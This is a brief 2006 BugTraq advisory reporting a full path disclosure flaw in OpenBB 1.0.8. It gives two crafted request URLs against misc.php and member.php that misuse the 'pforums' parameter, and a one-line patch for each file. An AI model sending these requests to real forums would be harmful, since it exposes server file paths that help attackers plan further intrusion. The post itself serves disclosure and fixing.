BugTraq
OpenBB 1.0.8 Full Path Disclosure Apr 28 2006 06:50PM
o y 6 hotmail com
OpenBB 1.0.8 Full Path Disclosure

Bug Found By :- Devil-00

Gr33tz :- Www.securitygurus.neT

Rock Master

Hackers Pal

n0m3rcy

-= 1-2 =-

Full Path Disclosure

Exploits :-

/OpenBB/misc.php?action=latest&pforums=D3vil-0x1

/OpenBB/member.php?action=online&&pforums=D3vil-0x1

Fix It :-

misc.php

Add This Line To '36' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]

-------------------------------------

member.php

Add This Line To '759' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus